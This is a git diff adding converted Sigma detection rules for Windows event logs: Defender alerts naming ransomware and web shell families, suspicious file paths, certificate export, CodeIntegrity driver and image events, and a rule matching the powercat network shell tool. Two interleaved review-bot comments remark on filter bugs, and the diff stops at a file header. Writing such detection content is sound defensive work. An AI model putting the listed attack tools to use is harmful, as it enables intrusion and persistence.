+ - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7
+ - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045
+ - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d
+ - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2022/05/12
+modified: 2023/02/03
+tags:
+ - attack.t1486
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ ThreatName|contains:
+ - Ransom
+ - Cryptor
+ - Crypter
+ - CRYPTES
+ - GandCrab
+ - BlackWorm
+ - Phobos
+ - Destructor
+ - Filecoder
+ - GrandCrab
+ - Krypt
+ - Locker
+ - Ryuk
+ - Ryzerlo
+ - Tescrypt
+ - TeslaCrypt
+ condition: antivirus and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml
new file mode 100644
index 000000000..cab783e17
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml
@@ -0,0 +1,99 @@
+title: Antivirus Relevant File Paths Alerts
+id: c9a88268-0047-4824-ba6e-4d81ce0b907c
+status: test
+description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
+references:
+ - https://www.nextron-systems.com/?s=antivirus
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2018/09/09
+modified: 2023/10/23
+tags:
+ - attack.resource_development
+ - attack.t1588
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection_path:
+ Path|contains:
+ # could be startswith, if there is a better backend handling
+ - :\Windows\
+ - :\Temp\
+ - :\PerfLogs\
+ - :\Users\Public\
+ - :\Users\Default\
+ # true 'contains' matches:
+ - \Client\
+ - \tsclient\
+ - \inetpub\
+ - /www/
+ - apache
+ - tomcat
+ - nginx
+ - weblogic
+ selection_ext:
+ Path|endswith:
+ - .asax
+ - .ashx
+ - .asmx
+ - .asp
+ - .aspx
+ - .bat
+ - .cfm
+ - .cgi
+ - .chm
+ - .cmd
+ - .dat
+ - .ear
+ - .gif
+ - .hta
+ - .jpeg
+ - .jpg
+ - .jsp
+ - .jspx
+ - .lnk
+ - .php
+ - .pl
+ - .png
+ - .ps1
+ - .psm1
+ - .py
+ - .pyc
+ - .rb
+ - .scf
+ - .sct
+ - .sh
+ - .svg
+ - .txt
+ - .vbe
+ - .vbs
+ - .war
+ - .wsf
+ - .wsh
+ - .xml
+ condition: antivirus and (1 of selection_*)
+fields:
+ - ThreatName
+ - User
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml
new file mode 100644
index 000000000..94ea3ca22
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml
@@ -0,0 +1,103 @@
+title: Antivirus Web Shell Detection
+id: fdf135a2-9241-4f96-a114-bb404948f736
+status: test
+description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.
+references:
+ - https://www.nextron-systems.com/?s=antivirus
+ - https://github.com/tennc/webshell
+ - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection
+ - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection
+ - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection
+ - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection
+ - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection
+ - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
+ - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
+ - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
+author: Florian Roth (Nextron Systems), Arnim Rupp
+date: 2018/09/09
+modified: 2023/02/03
+tags:
+ - attack.persistence
+ - attack.t1505.003
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ - ThreatName|startswith:
+ - PHP.
+ - JSP.
+ - ASP.
+ - Perl.
+ - VBS/Uxor # looking for 'VBS/' would also find downloaders and droppers meant for desktops
+ - IIS/BackDoor
+ - JAVA/Backdoor
+ - Troj/ASP
+ - Troj/PHP
+ - Troj/JSP
+ - ThreatName|contains:
+ - Webshell
+ - Chopper
+ - SinoChoper
+ - ASPXSpy
+ - Aspdoor
+ - filebrowser
+ - PHP_
+ - JSP_
+ - ASP_ # looking for 'VBS_' would also find downloaders and droppers meant for desktops
+ - 'PHP:'
+ - 'JSP:'
+ - 'ASP:'
+ - 'Perl:'
+ - PHP/
+ - JSP/
+ - ASP/
+ - Perl/
+ - PHPShell
+ - Trojan.PHP
+ - Trojan.ASP
+ - Trojan.JSP
+ - Trojan.VBS
+ - PHP/Agent
+ - ASP/Agent
+ - JSP/Agent
+ - VBS/Agent
+ - Backdoor/PHP
+ - Backdoor/JSP
+ - Backdoor/ASP
+ - Backdoor/VBS
+ - Backdoor/Java
+ - PHP.Agent
+ - ASP.Agent
+ - JSP.Agent
+ - VBS.Agent
+ - Backdoor.PHP
+ - Backdoor.JSP
+ - Backdoor.ASP
+ - Backdoor.VBS
+ - Backdoor.Java
+ - PShlSpy
+ - C99shell
+ condition: antivirus and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml b/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml
new file mode 100644
index 000000000..037d75920
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml
@@ -0,0 +1,24 @@
+title: Certificate Exported From Local Certificate Store
+id: 58c0bff0-40a0-46e8-b5e8-b734b84d2017
+status: experimental
+description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.
+references:
+ - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
+author: Zach Mathis
+date: 2023/05/13
+tags:
+ - attack.credential_access
+ - attack.t1649
+logsource:
+ product: windows
+ service: certificateservicesclient-lifecycle-system
+detection:
+ certificateservicesclient_lifecycle_system:
+ Channel: Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
+ selection:
+ EventID: 1007 # A certificate has been exported
+ condition: certificateservicesclient_lifecycle_system and selection
+falsepositives:
+ - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml
new file mode 100644
index 000000000..1f6c76eb0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml
@@ -0,0 +1,106 @@
+title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation
+id: f8931561-97f5-4c46-907f-0a4a592e47a7
+status: experimental
+description: |
+ Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.
+ This event is best correlated with EID 3089 to determine the error of the validation.
+references:
+ - https://twitter.com/SBousseaden/status/1483810148602814466
+ - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+date: 2022/01/20
+modified: 2023/11/15
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID:
+ - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements.
+ - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. However, due to code integrity auditing policy, the image was allowed to load.
+ filter_optional_dtrace:
+ # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\DTrace\dtrace.dll that did not meet the Windows signing level requirements.
+ FileNameBuffer|endswith: \Program Files\DTrace\dtrace.dll
+ ProcessNameBuffer|endswith: \Windows\System32\svchost.exe
+ RequestedPolicy: 12
+ filter_optional_av_generic:
+ # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_36fb67bd6dbd887d\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
+ FileNameBuffer|contains: \Windows\System32\DriverStore\FileRepository\
+ FileNameBuffer|endswith: \igd10iumd64.dll
+ # ProcessNameBuffer is AV products
+ RequestedPolicy: 7
+ filter_optional_electron_based_app:
+ # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Users\user\AppData\Local\Keybase\Gui\Keybase.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvspcap64.dll that did not meet the Microsoft signing level requirements.
+ FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll
+ ProcessNameBuffer|endswith:
+ - \AppData\Local\Keybase\Gui\Keybase.exe
+ - \Microsoft\Teams\stage\Teams.exe
+ RequestedPolicy: 8
+ filter_optional_bonjour:
+ FileNameBuffer|endswith: \Program Files\Bonjour\mdnsNSP.dll
+ ProcessNameBuffer|endswith:
+ - \Windows\System32\svchost.exe
+ - \Windows\System32\SIHClient.exe
+ RequestedPolicy:
+ - 8
+ - 12
+ filter_optional_msoffice:
+ FileNameBuffer|contains: \Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE
+ FileNameBuffer|endswith: \MSOXMLMF.DLL
+ # ProcessNameBuffer is AV products
+ RequestedPolicy: 7
+ filter_optional_slack:
+ # Example: https://user-images.githubusercontent.com/112784902/197407680-96d4b662-8a59-4289-a483-b24d630ac2a9.png
+ # Even though it's the same DLL as the one used in the electron based app filter. We need to do a separate selection due to slack's folder naming convention with the version number :)
+ FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll
+ ProcessNameBuffer|contains: \AppData\Local\slack\app-
+ ProcessNameBuffer|endswith: \slack.exe
+ RequestedPolicy: 8
+ filter_optional_firefox:
+ # Example: https://user-images.githubusercontent.com/62423083/197451483-70e89010-ed96-4357-8079-b5a061a239d6.png
+ FileNameBuffer|endswith:
+ - \Mozilla Firefox\mozavcodec.dll
+ - \Mozilla Firefox\mozavutil.dll
+ ProcessNameBuffer|endswith: \Mozilla Firefox\firefox.exe
+ RequestedPolicy: 8
+ filter_optional_avast:
+ FileNameBuffer|endswith:
+ - \Program Files\Avast Software\Avast\aswAMSI.dll
+ - \Program Files (x86)\Avast Software\Avast\aswAMSI.dll
+ RequestedPolicy:
+ - 8
+ - 12
+ filter_main_gac:
+ # Filtering the path containing this string because of multiple possible DLLs in that location
+ FileNameBuffer|contains: \Windows\assembly\GAC\
+ ProcessNameBuffer|endswith: \mscorsvw.exe
+ ProcessNameBuffer|contains: \Windows\Microsoft.NET\
+ RequestedPolicy: 8
+ filter_optional_google_drive:
+ # Example: \Program Files\Google\Drive File Stream\67.0.2.0\crashpad_handler.exe
+ FileNameBuffer|contains: \Program Files\Google\Drive File Stream\
+ FileNameBuffer|endswith: \crashpad_handler.exe
+ ProcessNameBuffer|endswith: \Windows\ImmersiveControlPanel\SystemSettings.exe
+ RequestedPolicy: 8
+ filter_optional_trend_micro:
+ FileNameBuffer|endswith: \Trend Micro\Client Server Security Agent\perficrcperfmonmgr.dll
+ RequestedPolicy: 8
+ filter_optional_mdns_responder:
+ FileNameBuffer|endswith: '\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll '
+ filter_optional_mcafee:
+ FileNameBuffer|endswith:
+ - \Program Files\McAfee\Endpoint Security\Threat Prevention\MfeAmsiProvider.dll
+ - \Program Files\McAfee\MfeAV\AMSIExt.dll
+ filter_optional_eset:
+ FileNameBuffer|endswith: \Program Files\ESET\ESET Security\eamsi.dll
+ condition: codeintegrity_operational and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
+falsepositives:
+ - Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule.
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml
new file mode 100644
index 000000000..2344d95f3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml
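Review bot: In `filter_optional_mdns_responder` the quoted `FileNameBuffer|endswith` value ends with a space before the closing quote (`...\nimdnsNSP.dll '`), so it can never match a real file path and that filter is dead; the value should be `'\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll'`. The `mdns_responder`, `mcafee` and `eset` filters are also the only ones without a `RequestedPolicy` constraint, which is presumably deliberate but worth a one-line comment so it is not read as an omission. This hunk begins at its `@@` header three lines above this note.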
@@ -0,0 +1,25 @@
+title: CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked
+id: 5daf11c3-022b-4969-adb9-365e6c078c7c
+status: experimental
+description: Detects block events for files that are disallowed by code integrity for protected processes
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID: 3104 # Windows blocked file %2 which has been disallowed for protected processes.
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml
new file mode 100644
index 000000000..6ba9a0877
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml
@@ -0,0 +1,27 @@
+title: CodeIntegrity - Blocked Image/Driver Load For Policy Violation
+id: e4be5675-4a53-426a-8c81-a8bb2387e947
+status: experimental
+description: Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
+references:
+ - https://twitter.com/wdormann/status/1590434950335320065
+ - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/11/10
+modified: 2023/06/07
+tags:
+ - attack.privilege_escalation
+ - attack.t1543
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID: 3077 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy (Policy ID:%XX).
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml
new file mode 100644
index 000000000..cf72d4d5a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml
@@ -0,0 +1,26 @@
+title: CodeIntegrity - Blocked Driver Load With Revoked Certificate
+id: 9b72b82d-f1c5-4632-b589-187159bc6ec1
+status: experimental
+description: Detects blocked load attempts of revoked drivers
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+ - attack.t1543
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID: 3023 # The driver %2 is blocked from loading as the driver has been revoked by Microsoft.
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml
new file mode 100644
index 000000000..afaff2738
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml
@@ -0,0 +1,27 @@
+title: CodeIntegrity - Revoked Kernel Driver Loaded
+id: 320fccbf-5e32-4101-82b8-2679c5f007c6
+status: experimental
+description: Detects the load of a revoked kernel driver
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID:
+ - 3021 # Code Integrity determined a revoked kernel module %2 is loaded into the system. Check with the publisher to see if a new signed version of the kernel module is available.
+ - 3022 # Code Integrity determined a revoked kernel module %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml
new file mode 100644
index 000000000..f150675f7
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml
@@ -0,0 +1,25 @@
+title: CodeIntegrity - Blocked Image Load With Revoked Certificate
+id: 6f156c48-3894-4952-baf0-16193e9067d2
+status: experimental
+description: Detects blocked image load events with revoked certificates by code integrity.
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID: 3036 # Windows is unable to verify the integrity of the file %2 because the signing certificate has been revoked. Check with the publisher to see if a new signed version of the kernel module is available.
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml
new file mode 100644
index 000000000..232801454
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml
@@ -0,0 +1,27 @@
+title: CodeIntegrity - Revoked Image Loaded
+id: 881b7725-47cc-4055-8000-425823344c59
+status: experimental
+description: Detects image load events with revoked certificates by code integrity.
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID:
+ - 3032 # Code Integrity determined a revoked image %2 is loaded into the system. Check with the publisher to see if a new signed version of the image is available.
+ - 3035 # Code Integrity determined a revoked image %2 is loaded into the system. The image is allowed to load because kernel mode debugger is attached.
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml
new file mode 100644
index 000000000..f7e1bed39
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml
@@ -0,0 +1,25 @@
+title: CodeIntegrity - Unsigned Kernel Module Loaded
+id: 951f8d29-f2f6-48a7-859f-0673ff105e6f
+status: experimental
+description: Detects the presence of a loaded unsigned kernel module on the system.
+references:
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations
+ - Internal Research
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/06
+tags:
+ - attack.privilege_escalation
+logsource:
+ product: windows
+ service: codeintegrity-operational
+detection:
+ codeintegrity_operational:
+ Channel: Microsoft-Windows-CodeIntegrity/Operational
+ selection:
+ EventID: 3001 # Code Integrity determined an unsigned kernel module %2 is loaded into the system. Check with the publisher to see if a signed version of the kernel module is available
+ condition: codeintegrity_operational and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml
new file mode 100644
index 000000000..a34397684
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml
@@ -0,0 +1,25 @@ +title: CodeIntegrity - Unsigned Image Loaded +id: c92c24e7-f595-493f-9c98-53d5142f5c18 +status: experimental +description: Detects loaded unsigned image on the system +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: 3037 # Code Integrity determined an unsigned image %2 is loaded into the system. Check with the publisher to see if a signed version of the image is available. + condition: codeintegrity_operational and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml new file mode 100644 index 000000000..0d61abd52 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml 
@@ -0,0 +1,32 @@ +title: CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module +id: 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f +status: experimental +description: Detects loaded kernel modules that did not meet the WHQL signing requirements. +references: + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations + - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/06 +modified: 2023/06/14 +tags: + - attack.privilege_escalation +logsource: + product: windows + service: codeintegrity-operational +detection: + codeintegrity_operational: + Channel: Microsoft-Windows-CodeIntegrity/Operational + selection: + EventID: + - 3082 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. However, due to code integrity auditing policy, the image was allowed to load + - 3083 # Code Integrity determined kernel module %2 that did not meet the WHQL requirements is loaded into the system. Check with the publisher to see if a WHQL compliant kernel module is available + filter_optional_vmware: + FileNameBuffer: + - system32\drivers\vsock.sys + - System32\drivers\vmci.sys + condition: codeintegrity_operational and (selection and not 1 of filter_optional_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml new file mode 100644 index 000000000..f0b3c0fa1 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml 
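Review bot: The `filter_optional_vmware` entries are plain equality matches on `FileNameBuffer` against the relative fragments `system32\drivers\vsock.sys` and `System32\drivers\vmci.sys`; if the field in 3082/3083 events carries a fuller path (a `\Device\...` or `\SystemRoot\...` prefix, for instance), the filter never matches and the intended VMware exclusion is silently a no-op — confirm against a sample event and switch to `FileNameBuffer|endswith:` if so. The two entries also differ in the case of `system32`, which only works if the backend matches case-insensitively; normalising them removes a backend-dependent behaviour. Note that 3082 is the audit-policy variant (the module was loaded despite failing WHQL) while 3083 is the enforcement message, so the two carry different weight; a sentence in `description` saying both are included deliberately would save a reader from re-checking.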
@@ -0,0 +1,33 @@ +title: Netcat The Powershell Version - PowerShell Module +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 +status: deprecated +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md +author: frack113 +date: 2021/07/21 +modified: 2023/01/20 +tags: + - attack.command_and_control + - attack.t1095 +logsource: + product: windows + category: ps_module + definition: 'Requirements: PowerShell Module Logging must be enabled' +detection: + ps_module: + EventID: 4103 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ContextInfo|contains: + - 'powercat ' + - powercat.ps1 + condition: ps_module and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml new file mode 100644 index 000000000..32d087621 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_access_to_chrome_login_data.yml 
